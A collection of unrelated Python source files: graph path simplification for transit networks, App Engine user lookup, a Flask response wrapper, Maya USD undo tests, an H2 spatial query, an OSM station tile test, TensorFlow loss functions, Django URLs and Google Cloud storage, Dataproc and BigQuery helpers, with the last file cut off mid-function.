paths_to_simplify.append(
build_path(G,
successor,
endpoints,
path=[node, successor]))
except RuntimeError:
# Note: Recursion errors occur if some connected component
# is a self-contained ring in which all nodes are not
# end points handle it by just ignoring that
# component and letting its topology remain intact
# (this should be a rare occurrence).
log(('Recursion error: exceeded max depth, moving on to '
'next endpoint successor'), level=lg.WARNING)
return paths_to_simplify
def simplify_graph(G_orig: nx.MultiDiGraph) -> nx.MultiDiGraph:
# Note: This operation borrows heavily from the operation of
# the same name in OSMnx, as it existed in this state/commit:
# github.com/gboeing/osmnx/blob/
# c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py
# Function on line 203
# Prevent upstream mutation, always copy
G = G_orig.copy()
# Used to track updates to execute
all_nodes_to_remove = []
all_edges_to_add = []
# TODO: Improve this method to not produce any mixed mode path
# removal proposals
# Utilize the recursive function from OSMnx that identifies paths based
# on isolated successor nodes
paths_to_consider = get_paths_to_simplify(G)
# Iterate through the resulting path arrays to target
for path in paths_to_consider:
# If the path is not all one mode of travel, skip the
# proposed simplification
if not _path_has_consistent_mode_type(G, path):
continue
# Keep track of the edges to be removed so we can
# assemble a LineString geometry with all of them
edge_attributes = {}
# Work from the last edge through, "wrapped around," to the beginning
for u, v in zip(path[:-1], path[1:]):
# Should not be multiple edges between interstitial nodes
only_one_edge = G.number_of_edges(u, v) == 1
if not only_one_edge:
log(('Multiple edges between "{}" and "{}" '
'found when simplifying').format(u, v))
# We ask for the 0th edge as we assume there is only one
edge = G.edges[u, v, 0]
for key in edge:
if key in edge_attributes:
# If key already exists in dict, append
edge_attributes[key].append(edge[key])
else:
# Otherwise, initialize a list
edge_attributes[key] = [edge[key]]
# Note: In peartree, we opt to not preserve any other elements;
# we only keep length, mode and - in the case of simplified
# geometries - the shape of the simplified route
edge_attributes['mode'] = edge_attributes['mode'][0]
edge_attributes['length'] = sum(edge_attributes['length'])
# Construct the geometry from the points array
points_array = []
for node in path:
p = Point((G.nodes[node]['x'], G.nodes[node]['y']))
points_array.append(p)
edge_attributes['geometry'] = LineString(points_array)
# Add nodes and edges to respective lists for processing
all_nodes_to_remove.extend(path[1:-1])
all_edges_to_add.append({'origin': path[0],
'destination': path[-1],
'attr_dict': edge_attributes})
# For each edge to add in the list we assembled, create a new edge between
# the origin and destination
for edge in all_edges_to_add:
G.add_edge(edge['origin'], edge['destination'], **edge['attr_dict'])
# Remove all the interstitial nodes between the new edges, which will also
# knock out the related edges from the graph
G.remove_nodes_from(set(all_nodes_to_remove))
# TODO: This step could be significantly optimized (as well as
# parameterized, made optional)
# A final step that cleans out all duplicate edges (not desired in a
# simplified network)
mult_edges = []
mult_edges_full = []
for fr, to, edge in G.edges(data=True):
if G.number_of_edges(fr, to) > 1:
mult_edges.append((fr, to))
mult_edges_full.append((fr, to, edge))
# Clean out the permutations to just one of each
mult_edges = set(mult_edges)
# TODO: This nested for loop is sloppy; clean up (numpy scalars, perhaps)
for fr1, to1 in mult_edges:
subset_edges = []
for fr2, to2, edge in mult_edges_full:
if fr1 == fr2 and to1 == to2:
subset_edges.append(edge)
keep = max(subset_edges, key=lambda x: x['length'])
# Drop all the edges
edge_ct = len(subset_edges)
G.remove_edges_from([(fr1, to1)] * edge_ct)
# Then just re-add the one that we want
G.add_edge(fr1, to1, **keep)
return G
|
import json
import os
import time
import uuid
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from models.profile import Profile, TeeShirtSize
def getUserId(user, id_type="email"):
"""
Retrieve User id from a given user object
:param user: A current user object from API endpoint.
Example: user = endpoints.get_current_user()
:param id_type: define return type of this function.
- email: return user email address
- oauth: return user information from google+ oauth.
- custom: return current user id or generate unique id
:return: email, oauth user id, or user id of the corresponding entity
"""
if id_type == "email":
return user.email()
if id_type == "oauth":
"""A workaround implementation for getting userid."""
auth = os.getenv('HTTP_AUTHORIZATION')
bearer, token = auth.split()
token_type = 'id_token'
if 'OAUTH_USER_ID' in os.environ:
token_type = 'access_token'
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% (token_type, token))
user = {}
wait = 1
for i in range(3):
resp = urlfetch.fetch(url)
if resp.status_code == 200:
user = json.loads(resp.content)
break
elif resp.status_code == 400 and 'invalid_token' in resp.content:
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% ('access_token', token))
else:
time.sleep(wait)
wait = wait + i
return user.get('user_id', '')
if id_type == "custom":
# implement your own user_id creation and getting algorythm
# this is just a sample that queries datastore for an existing profile
# and generates an id if profile does not exist for an email
profile = Profile.query(Profile.mainEmail == user.email())
if profile:
return profile.id()
else:
return str(uuid.uuid1().get_hex())
def getProfileFromUser(user):
"""
Return user Profile from datastore, creating new one if non-existent.
:param user: A current user object from API endpoint.
Example: user = endpoints.get_current_user()
:return: Profile object
"""
user_id = getUserId(user)
p_key = ndb.Key(Profile, user_id)
profile = p_key.get()
if not profile:
profile = Profile(
key=p_key,
displayName=user.nickname(),
mainEmail=user.email(),
teeShirtSize=str(TeeShirtSize.NOT_SPECIFIED),
)
profile.put()
# return Profile
return profile
|
#coding:utf-8
import json as Json
from flask import Response,make_response
from mantis.fundamental.errors import ErrorDefs,ValueEntry
SUCC = 0
ERROR = 1
class CallReturn(object):
def __init__(self,status=SUCC,errcode=0,errmsg='',result=None):
self.status = status
self.errcode = errcode
self.errmsg = errmsg
self.result = result
def assign(self,result):
self.result = result
return self
@property
def json(self):
data = {
'status':self.status,
'errcode':self.errcode,
'errmsg':self.errmsg
}
errmsg = self.errmsg
if isinstance(self.errcode,ValueEntry):
data['errcode'] = self.errcode.value
if not errmsg:
errmsg = self.errcode.comment
data['errmsg'] = errmsg
if self.result is not None:
data['result'] = self.result
return Json.dumps(data)
@property
def response(self):
resp = Response(self.json)
resp.headers['Content-Type'] = "application/json"
return resp
def ErrorReturn(errcode,errmsg='',result=None):
return CallReturn(ERROR,errcode,errmsg,result)
CR = CallReturn
|
#!/usr/bin/env python
#
# Copyright 2020 Autodesk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import maya.cmds as cmds
from pxr import Tf, Usd, UsdGeom, Gf
import mayaUsd.lib as mayaUsdLib
class TestUsdUndoManager(unittest.TestCase):
@classmethod
def setUpClass(cls):
cmds.loadPlugin('mayaUsdPlugin')
def setUp(self):
# create a stage in memory
self.stage = Usd.Stage.CreateInMemory()
# track the edit target layer
mayaUsdLib.UsdUndoManager.trackLayerStates(self.stage.GetRootLayer())
# clear selection to start off
cmds.select(clear=True)
def testSimpleUndoRedo(self):
'''
Simple test to demonstrate the basic usage of undo/redo service.
'''
# start with a new file
cmds.file(force=True, new=True)
# get pseudo root prim
defaultPrim = self.stage.GetPseudoRoot()
# get the current number of commands on the undo queue
nbCmds = cmds.undoInfo(q=True)
self.assertEqual(cmds.undoInfo(q=True), 0)
self.assertEqual(len(defaultPrim.GetChildren()), 0)
# create undo block
with mayaUsdLib.UsdUndoBlock():
prim = self.stage.DefinePrim('/World', 'Sphere')
self.assertTrue(bool(prim))
# check number of children under the root
self.assertEqual(len(defaultPrim.GetChildren()), 1)
# demonstrate there is one additional command on the undo queue
# and that it's our command.
self.assertEqual(cmds.undoInfo(q=True), nbCmds+1)
# undo
cmds.undo()
# check number of children under the root
self.assertEqual(len(defaultPrim.GetChildren()), 0)
# redo
cmds.redo()
# check number of children under the root
self.assertEqual(len(defaultPrim.GetChildren()), 1)
def testNestedUsdUndoBlock(self):
'''
Nested UsdUndoBlock are supported but only the top level block
will transfer the edits to UsdUndoableItem.
'''
# start with a new file
cmds.file(force=True, new=True)
# get the current number of commands on the undo queue
nbCmds = cmds.undoInfo(q=True)
self.assertEqual(cmds.undoInfo(q=True), 0)
with mayaUsdLib.UsdUndoBlock():
prim = self.stage.DefinePrim('/World')
with mayaUsdLib.UsdUndoBlock():
prim.SetActive(False)
with mayaUsdLib.UsdUndoBlock():
prim.SetActive(True)
with mayaUsdLib.UsdUndoBlock():
prim.SetActive(False)
# expect to have 2 items on the undo queue
self.assertEqual(cmds.undoInfo(q=True), nbCmds+2)
|
import jaydebeapi
dirver = 'org.h2.Driver'
url = 'jdbc:h2:tcp://192.168.0.242:9101/~/ship5'
username = 'sa'
password = ''
jar = 'D:\development\h2gis-standalone\h2gis-dist-1.5.0.jar'
conn = jaydebeapi.connect(dirver, url, [username, password], jar)
curs = conn.cursor()
LINESTRING="LINESTRING(123.85507399897297 36.35646292498599,123.76116568903645 36.54704329302798,123.7572041259261 36.55419585040103,123.64867598871906 36.72953078082095,123.52717406611164 36.89056250384341,123.47056777338703 36.95641753008853,123.37236220698078 37.06010481646548,123.36652953486164 37.06589934161197,123.16477019648273 37.24630019000064,122.926736901805 37.42191740801822,122.87312896113117 37.45738264849673,122.77634436945637 37.51833388140689,122.72367102961262 37.54999968340884,122.71519858698566 37.55500075152408,122.70384127955158 37.561666934995756,122.6467018828841 37.59455534747134,122.63826281885822 37.59932371905337,122.61623866419514 37.6116661720563,122.60121829371174 37.61999937823306,122.59221846918781 37.624960392027006,122.59214598993977 37.625000446348295,122.58303267817219 37.6299996071149,122.56774337153156 37.638332813291655,122.54923446039875 37.64833304217349,122.51684577326496 37.66560599139224,122.47554976801594 37.68722578814517,122.47163970331867 37.689249485044584,122.47019011835773 37.68999907305728,122.4362698302718 37.70738837054263,122.32436377863606 37.762844532041655,122.28107268671711 37.7835640602399,122.27314765314777 37.78731581500064,122.25967604975422 37.79366347125064,122.14418036799152 37.846659153013334,122.08873374323566 37.871250598936186,122.07710654597004 37.87634131243716,122.06227881769856 37.8828015022565,122.01850516657551 37.90166708758365,121.99108321528156 37.91333243182193,121.94743926386555 37.93166586688052,121.94541556696613 37.932508914976225,121.93493468622883 37.9368672066022,121.87482840876301 37.96155974200259,121.86805350641926 37.96431204607974,121.70179183344563 38.02999922564517,121.6780215011092 38.039116352110014,121.67709834437092 38.039469211607084,121.66394908289631 38.04448363116275,121.56544787745197 38.08144041827212,121.42016322474201 38.134134738950834,121.41327197413166 38.136583774595366,121.40484149317463 38.139574497251616,121.39893157343586 38.14166685870181,121.33697135309895 38.16341635516177,121.32283027033527 38.16833349993716,121.29391677241047 38.178333728819,121.2793865905257 38.1833328895856,121.2452765212508 38.195000141172514,121.22566325525959 38.201666324644194,121.14049250940998 38.23026701739322,121.11883551935871 38.23745199969302,121.08451468805988 38.2487682991315,121.07568080286701 38.25166746905337,121.00910575251301 38.27334067156802,120.8505421386214 38.32378241351138,120.8304348693343 38.3300671272565,120.79810244898518 38.340122669248686,120.60154254297932 38.40000006487857,120.58482272486408 38.40499922564517,120.53309256891926 38.42038008502017,120.5222073302718 38.42359968951236,120.51112182001789 38.426872699766264,120.47818572382648 38.436563938169584,120.46077544550617 38.44166609576236,120.44477469782551 38.446342914610014,120.27012259821613 38.49666640093814,120.26233298639973 38.498880832700834,120.24665076594074 38.50333258440982,120.21654708246906 38.51185080340396,120.19355208735188 38.51833388140689,120.18010337214191 38.522116153745756,120.15784461359699 38.528360813169584,120.14007575373371 38.53333327105533,120.11020095209797 38.541666477232084,120.08621985773762 38.548332660703764,120.074197839305 38.55166670611392,120.06818206171711 38.553333728819,120.06018645624836 38.55554625323306,120.04593093256672 38.55948683550845,120.03803069452961 38.561666934995756,120.0186501250716 38.56700751116763,120.0077687011214 38.570000141172514,119.99563033442219 38.57333418658267,119.9678688750716 38.58094069293033,119.85980231623371 38.61031576922427,119.85480124811848 38.6116661720563,119.83626181940754 38.61666724017154,119.81768805842121 38.62166640093814,119.81192786555012 38.62321516802798,119.8052826629134 38.625000446348295,119.80380446772297 38.62539717486392,119.80141074518879 38.62603995135318,119.78981406550129 38.629150836973295,119.78875357966145 38.629435031919584,119.78481871943195 38.63048979571353,119.78042418818195 38.631666629819975,119.77748305659016 38.63245436480533,119.75163085322102 38.63936659625064,119.74908072809895 38.64004751971255,119.74705130915363 38.64058920672427,119.7415619597884 38.64205405047427,119.73676307062824 38.64333388140689,119.73050696711262 38.64500090411197,119.72956282953938 38.6452526741315,119.7294769988509 38.64527556231509,119.72776515345295 38.645731418638334,119.72425563196857 38.64666601946841,119.72285849909504 38.64703795245181,119.71803672175129 38.648321598081694,119.71542556147297 38.64901587298404,119.70783812861164 38.65103384783755,119.70625884394367 38.65145346453677,119.70618636469563 38.6514725380231,119.7051678405257 38.65174338152896,119.70478064875324 38.65184637835513,119.70437056879719 38.6519550972272,119.70376021723469 38.65211722186099,119.70342452387531 38.65220686724673,119.70310027460773 38.65229269793521,119.70290763239582 38.652344196348295,119.70287806849201 38.65235182574283,119.7028713927718 38.65235373309146,119.70285613398273 38.652357547788725,119.70274169306477 38.65238806536685,119.70245463709553 38.65246435931216,119.70242507319172 38.652471988706694,119.70241172175129 38.65247580340396,119.70228965143879 38.65250822833072,119.70218188624104 38.65253683856021,119.70206649164875 38.652567356138334,119.6991806731673 38.653334110288725,119.65940768580158 38.66387602618228,119.56526858668049 38.688665836362944,119.56285960535725 38.689297168760405,119.46577269892414 38.71463248065005,119.44843489985188 38.71913382342349,119.36452300409992 38.7408280067731,119.31309993128498 38.754049747495756,119.28042037348469 38.762424915342436,119.2668362365218 38.76590010455142,119.19580085138996 38.78401610186587,119.19523055414875 38.78416106036197,119.19337088923176 38.784634082822905,119.18909556727131 38.78572127154361,119.18796260218342 38.78600928118716,119.18763167719563 38.786093204527006,119.18678481440266 38.786308734922514,119.18646247248371 38.786390750913725,119.18619925837238 38.78645750811587,119.18592173914631 38.78652808001529,119.13034255366047 38.80062910845767,119.1293621764632 38.800877063779936,119.12188823084553 38.802769153623686,119.10350997309406 38.80741736224185,119.07327563624104 38.815052478819,118.98544795374592 38.83714911273013,118.96637256006916 38.841932743101225,118.92140014033039 38.853189914732084,118.78167159418781 38.88799139788638,118.71773345331867 38.903835742979155,118.71703917841633 38.90400740435611,118.71449572901447 38.904636829404936,118.71165854792316 38.90533873370181,118.59876067499836 38.9331993751813,118.58602912287434 38.936333148985014,118.47785765986164 38.96290060809146,118.38089949946125 38.986633747129545)"
sql = "select * from world_country where geom && st_geomfromtext('"+LINESTRING+"') and st_intersects(st_geomfromtext('"+LINESTRING+"'),geom)"
curs.execute(sql)
result = curs.fetchall()[0][0]
print(result)
# for row in result:
# print(row[0], row[1], row[2])
|
stations = [
# Stations and lines, etc... used in exploring the NYC Penn Station
# object network.
#https://www.openstreetmap.org/node/895371274
#https://www.openstreetmap.org/relation/1359387
#https://www.openstreetmap.org/relation/1377996
#https://www.openstreetmap.org/relation/1377998
#https://www.openstreetmap.org/relation/1377999
#https://www.openstreetmap.org/relation/1380577
#https://www.openstreetmap.org/relation/1590286
#https://www.openstreetmap.org/relation/1809808
#https://www.openstreetmap.org/relation/1834644
#https://www.openstreetmap.org/relation/1897938
#https://www.openstreetmap.org/relation/1900976
#https://www.openstreetmap.org/relation/207401
#https://www.openstreetmap.org/relation/2648181
#https://www.openstreetmap.org/relation/2807121
#https://www.openstreetmap.org/relation/4044002
#https://www.openstreetmap.org/relation/4073816
#https://www.openstreetmap.org/relation/4234377
#https://www.openstreetmap.org/relation/4234911
#https://www.openstreetmap.org/relation/4445771
#https://www.openstreetmap.org/relation/4452779
#https://www.openstreetmap.org/relation/4460896
#https://www.openstreetmap.org/relation/4467189
#https://www.openstreetmap.org/relation/4467190
#https://www.openstreetmap.org/relation/4748609
#https://www.openstreetmap.org/relation/4799100
#https://www.openstreetmap.org/relation/4799101
(13, 2412, 3078, 'Penn Station', 895371274L, 1, [
'2100-2297', # Acela Express
'68-69', # Adirondack
'50-51', # Cardinal
'79-80', # Carolinian
'19-20', # Crescent
'230-296', # Empire Service
'600-674', # Keystone Service
'63', # Maple Leaf (Northbound)
'64', # Maple Leaf (Southbound)
'89-90', # Palmetto
'42-43', # Pennsylvanian
'97-98', # Silver Meteor
'91-92', # Silver Star
'54-57', # Vermonter
]),
#https://www.openstreetmap.org/node/1129957203
#https://www.openstreetmap.org/node/1129957312
#https://www.openstreetmap.org/node/845910705
#https://www.openstreetmap.org/relation/1401995
#https://www.openstreetmap.org/relation/1402004
#https://www.openstreetmap.org/relation/1403277
#https://www.openstreetmap.org/relation/1403278
(13, 2352, 3122, 'Camden Station', 845910705L, 5, ['Camden Line']),
#https://www.openstreetmap.org/node/297863017
#https://www.openstreetmap.org/relation/2124174
#https://www.openstreetmap.org/relation/3433312
#https://www.openstreetmap.org/relation/3433314
#https://www.openstreetmap.org/relation/3433316
#https://www.openstreetmap.org/relation/3435875
#https://www.openstreetmap.org/relation/63250
#https://www.openstreetmap.org/relation/63572
#https://www.openstreetmap.org/relation/91022
#https://www.openstreetmap.org/way/256270166
(13, 1309, 3166, 'Castro MUNI', 297863017L, 1, ['K', 'L', 'M', 'T']),
#https://www.openstreetmap.org/node/2058688536
#https://www.openstreetmap.org/node/2058688538
#https://www.openstreetmap.org/node/3426208027
#https://www.openstreetmap.org/node/3426249715
#https://www.openstreetmap.org/node/3426249720
#https://www.openstreetmap.org/node/3426249721
#https://www.openstreetmap.org/relation/1269021
#https://www.openstreetmap.org/relation/1359387
#https://www.openstreetmap.org/relation/1388639
#https://www.openstreetmap.org/relation/1388641
#https://www.openstreetmap.org/relation/1388648
#https://www.openstreetmap.org/relation/1390116
#https://www.openstreetmap.org/relation/1390117
#https://www.openstreetmap.org/relation/1390133
#https://www.openstreetmap.org/relation/1402781
#https://www.openstreetmap.org/relation/1405499
#https://www.openstreetmap.org/relation/1590286
#https://www.openstreetmap.org/relation/1809808
#https://www.openstreetmap.org/relation/1897938
#https://www.openstreetmap.org/relation/1900976
#https://www.openstreetmap.org/relation/206515
#https://www.openstreetmap.org/relation/2629937
#https://www.openstreetmap.org/relation/2629938
#https://www.openstreetmap.org/relation/2648181
#https://www.openstreetmap.org/relation/2807121
#https://www.openstreetmap.org/relation/4044002
#https://www.openstreetmap.org/relation/4460896
#https://www.openstreetmap.org/relation/4744254
#https://www.openstreetmap.org/relation/4748609
#https://www.openstreetmap.org/relation/4799100
#https://www.openstreetmap.org/relation/4799101
#https://www.openstreetmap.org/way/30953448
#https://www.openstreetmap.org/way/32272623
#https://www.openstreetmap.org/way/43352433
#https://www.openstreetmap.org/way/60185604
#https://www.openstreetmap.org/way/60185611
(13, 2385, 3102, '30th Street', 32272623L, 1, [
'2100-2297', # Acela Express
'79-80', # Carolinian
'19-20', # Crescent
'600-674', # Keystone Service
'82-198', # Northeast Regional (Boston/Springfield & Lynchburg)
'89-90', # Palmetto
'Chestnut Hill West Line', # SEPTA - Chestnut Hill West Line
'Cynwyd Line', # SEPTA - Cynwyd Line
'Media/Elwyn Line', # SEPTA - Media/Elwyn Line
'Trenton Line', # SEPTA - Trenton Line
'Wilmington/Newark Line', # SEPTA - Wilmington/Newark Line
'91-92', # Silver Star
])
]
for z, x, y, name, osm_id, expected_rank, expected_routes in stations:
with features_in_tile_layer(z, x, y, 'pois') as pois:
found = False
for poi in pois:
props = poi['properties']
if props['id'] == osm_id:
found = True
routes = list()
for typ in ['train', 'subway', 'light_rail', 'tram']:
routes.extend(props.get('%s_routes' % typ, list()))
rank = props['kind_tile_rank']
if rank > expected_rank:
raise Exception("Found %r, and was expecting a rank "
"of %r or less, but got %r."
% (name, expected_rank, rank))
for r in expected_routes:
count = 0
for route in routes:
if r in route:
count = count + 1
if count == 0:
raise Exception("Found %r, and was expecting at "
"least one %r route, but found "
"none. Routes: %r"
% (name, r, routes))
if not found:
raise Exception("Did not find %r (ID=%r) in tile." % (name, osm_id))
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def l1_loss(predictions, targets):
total_elements = (tf.shape(targets)[0] * tf.shape(targets)[1] * tf.shape(targets)[2]
* tf.shape(targets)[3])
total_elements = tf.to_float(total_elements)
loss = tf.reduce_sum(tf.abs(predictions- targets))
loss = tf.div(loss, total_elements)
return loss
def l2_loss(predictions, targets):
total_elements = (tf.shape(targets)[0] * tf.shape(targets)[1] * tf.shape(targets)[2]
* tf.shape(targets)[3])
total_elements = tf.to_float(total_elements)
loss = tf.reduce_sum(tf.square(predictions-targets))
loss = tf.div(loss, total_elements)
return loss
|
from django.urls import path
from .views import *
urlpatterns = [
path('simple', SimpleOrderView.as_view()),
path('simple/<str:order_id>', SimpleOrderView.as_view()),
path('pintuan/<str:action>', PinTuanOrderView.as_view()),
path('pay/notify', pay_notify),
]
|
import os, csv
from google.cloud import storage
from google.cloud import bigquery
from google.cloud.bigquery import LoadJobConfig
from google.cloud.bigquery import SchemaField
import googleapiclient.discovery
#########################
#########################
##### CLOUD STORAGE #####
#########################
#########################
#https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/storage/cloud-client/snippets.py
def list_buckets(project):
storage_client = storage.Client(project=project)
buckets = storage_client.list_buckets()
for bucket in buckets:
print('Bucket {} found'.format(bucket.name))
def create_bucket(bucket_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.create_bucket(bucket_name)
print('Bucket {} created'.format(bucket.name))
def delete_bucket(bucket_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
bucket.delete()
print('Bucket {} deleted'.format(bucket.name))
def list_blobs(bucket_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blobs = bucket.list_blobs()
for blob in blobs:
print('File {} found'.format(blob.name))
def upload_blob(bucket_name, source_file_name, destination_blob_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(destination_blob_name)
blob.upload_from_filename(source_file_name)
print('File {} uploaded to {}'.format(
source_file_name,
destination_blob_name))
def download_blob(bucket_name, source_blob_name, destination_file_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(source_blob_name)
blob.download_to_filename(destination_file_name)
print('Blob {} downloaded to {}'.format(source_blob_name, destination_file_name))
def delete_blob(bucket_name, blob_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(blob_name)
blob.delete()
print('Blob {} deleted'.format(blob_name))
def delete_all_buckets_and_blobs(project):
storage_client = storage.Client(project=project)
buckets = storage_client.list_buckets()
for bucket in buckets:
blobs = bucket.list_blobs()
for blob in blobs:
blob.delete()
print('Blob {} deleted'.format(blob))
bucket.delete()
print('Bucket {} deleted'.format(bucket))
#########################
#########################
####### DATAPROC ########
#########################
#########################
#https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/dataproc/submit_job_to_cluster.py
def get_pyspark_file(filename):
f = open(filename, 'rb')
return f, os.path.basename(filename)
def get_region_from_zone(zone):
try:
region_as_list = zone.split('-')[:-1]
return '-'.join(region_as_list)
except (AttributeError, IndexError, ValueError):
raise ValueError('Invalid zone provided, please check your input.')
def upload_pyspark_file(project_id, bucket_name, filename, file):
client = storage.Client(project=project_id)
bucket = client.get_bucket(bucket_name)
blob = bucket.blob(filename)
blob.upload_from_file(file)
def download_output(project_id, cluster_id, output_bucket, job_id):
client = storage.Client(project=project_id)
bucket = client.get_bucket(output_bucket)
output_blob = (
'google-cloud-dataproc-metainfo/{}/jobs/{}/driveroutput.000000000'
.format(cluster_id, job_id))
return bucket.blob(output_blob).download_as_string()
def create_cluster(project, zone, region, cluster_name,
master_type='n1-standard-1',
worker_type='n1-standard-1',
sec_worker_type='n1-standard-1',
no_masters=1, no_workers=2, no_sec_workers=1,
sec_worker_preemptible=True,
dataproc_version='1.2'):
print('Creating cluster...')
dataproc = get_client()
zone_uri = \
'https://www.googleapis.com/compute/v1/projects/{}/zones/{}'.format(
project, zone)
# cluster_data defines cluster: https://cloud.google.com/dataproc/docs/reference/rest/v1/ClusterConfig
cluster_data = {
'projectId': project,
'clusterName': cluster_name,
'config': {
'gceClusterConfig': {
'zoneUri': zone_uri
},
'masterConfig': {
'numInstances': no_masters,
'machineTypeUri': master_type
},
'workerConfig': {
'numInstances': no_workers,
'machineTypeUri': worker_type
},
'secondaryWorkerConfig': {
'numInstances': no_sec_workers,
'machineTypeUri': sec_worker_type,
"isPreemptible": sec_worker_preemptible
},
'softwareConfig': {
'imageVersion': dataproc_version
}
}
}
result = dataproc.projects().regions().clusters().create(
projectId=project,
region=region,
body=cluster_data).execute()
return result
def wait_for_cluster_creation(project_id, region, cluster_name):
print('Waiting for cluster creation...')
dataproc = get_client()
while True:
result = dataproc.projects().regions().clusters().list(
projectId=project_id,
region=region).execute()
cluster_list = result['clusters']
cluster = [c
for c in cluster_list
if c['clusterName'] == cluster_name][0]
if cluster['status']['state'] == 'ERROR':
raise Exception(result['status']['details'])
if cluster['status']['state'] == 'RUNNING':
print("Cluster created.")
break
def list_clusters_with_details(project, region):
dataproc = get_client()
result = dataproc.projects().regions().clusters().list(projectId=project, region=region).execute()
if result:
cluster_list = result['clusters']
for cluster in cluster_list:
print("{} - {}".format(cluster['clusterName'], cluster['status']['state']))
return result
else:
print('There are no Dataproc Clusters in this Project and Region')
def get_cluster_id_by_name(cluster_list, cluster_name):
cluster = [c for c in cluster_list if c['clusterName'] == cluster_name][0]
return cluster['clusterUuid'], cluster['config']['configBucket']
def submit_pyspark_job(project, region, cluster_name, bucket_name, filename):
dataproc = get_client()
job_details = {
'projectId': project,
'job': {
'placement': {
'clusterName': cluster_name
},
'pysparkJob': {
'mainPythonFileUri': 'gs://{}/{}'.format(bucket_name, filename)
}
}
}
result = dataproc.projects().regions().jobs().submit(
projectId=project,
region=region,
body=job_details).execute()
job_id = result['reference']['jobId']
print('Submitted job ID {}'.format(job_id))
return job_id
def delete_cluster(project, region, cluster):
dataproc = get_client()
print('Tearing down cluster')
result = dataproc.projects().regions().clusters().delete(
projectId=project,
region=region,
clusterName=cluster).execute()
return result
def wait_for_job(project, region, job_id):
dataproc = get_client()
print('Waiting for job to finish...')
while True:
result = dataproc.projects().regions().jobs().get(
projectId=project,
region=region,
jobId=job_id).execute()
# Handle exceptions
if result['status']['state'] == 'ERROR':
raise Exception(result['status']['details'])
elif result['status']['state'] == 'DONE':
print('Job finished.')
return result
def get_client():
dataproc = googleapiclient.discovery.build('dataproc', 'v1')
return dataproc
# Picks a PySpark file from a local file
# Creates a new Dataproc cluster
# Uploads the PySpark file to GCS
# Connects to created Dataproc cluster
# Runs job in Dataproc cluster
# Waits for job to complete, writes results to GCS bucket
# Downloads results from GCS to local file
# Deletes Dataproc cluster
def submit_pyspark_job_to_cluster(project_id, zone, cluster_name,
bucket_name, pyspark_file=None, create_new_cluster=True,
master_type='n1-standard-1',
worker_type='n1-standard-1',
sec_worker_type='n1-standard-1',
no_masters=1,
no_workers=2,
no_sec_workers=1,
sec_worker_preemptible=True,
dataproc_version='1.2'):
region = get_region_from_zone(zone)
try:
spark_file, spark_filename = get_pyspark_file(pyspark_file)
if create_new_cluster:
create_cluster(project_id, zone, region, cluster_name)
wait_for_cluster_creation(project_id, region, cluster_name)
upload_pyspark_file(project_id, bucket_name, spark_filename, spark_file)
cluster_list = list_clusters_with_details(project_id, region)['clusters']
(cluster_id, output_bucket) = (get_cluster_id_by_name(cluster_list, cluster_name))
job_id = submit_pyspark_job(project_id, region, cluster_name, bucket_name, spark_filename)
wait_for_job(project_id, region, job_id)
output = download_output(project_id, cluster_id, output_bucket, job_id)
print('Received job output {}'.format(output))
return output
finally:
if create_new_cluster:
delete_cluster(project_id, region, cluster_name)
spark_file.close()
#########################
#########################
####### BIGQUERY ########
#########################
#########################
# https://googleapis.github.io/google-cloud-python/latest/bigquery/index.html
def list_datasets(project):
client = bigquery.Client(project=project)
datasets = list(client.list_datasets())
if datasets:
print('Datasets in project {}:'.format(project))
for dataset in datasets:
print('\t{}'.format(dataset.dataset_id))
else:
print('{} project does not contain any datasets'.format(project))
def create_dataset(project, dataset_id):
client = bigquery.Client(project=project)
datasets = list(client.list_datasets())
try:
dataset_ref = client.dataset(dataset_id)
dataset = bigquery.Dataset(dataset_ref)
dataset.location = 'US'
dataset = client.create_dataset(dataset)
print('Dataset {} created'.format(dataset_id))
except:
print('Dataset {} already exists'.format(dataset_id))
def delete_dataset(project, dataset_id):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
client.delete_dataset(dataset_ref, delete_contents=True)
print('Dataset {} deleted'.format(dataset_id))
except:
print('Dataset {} does not exist'.format(dataset_id))
def list_tables(project, dataset_id):
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
tables = list(client.list_tables(dataset_ref))
if tables:
print('Tables in dataset {}:'.format(dataset_id))
for table in tables:
print('\t{}'.format(table.table_id))
else:
print('{} dataset does not contain any tables'.format(dataset_id))
def create_table(project, dataset_id, table_id):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
schema = [
bigquery.SchemaField('full_name', 'STRING', mode='REQUIRED'),
bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED'),
]
table_ref = dataset_ref.table(table_id)
table = bigquery.Table(table_ref, schema=schema)
table = client.create_table(table)
print('Table {} created'.format(table_id))
except:
print('Table {} already exists'.format(table_id))
def get_table(project, dataset_id, table_id):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
print(table.schema)
print(table.description)
print(table.num_rows)
except:
print('Table {} does not exist'.format(table_id))
def insert_in_table(project, table_id, dataset_id, rows):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
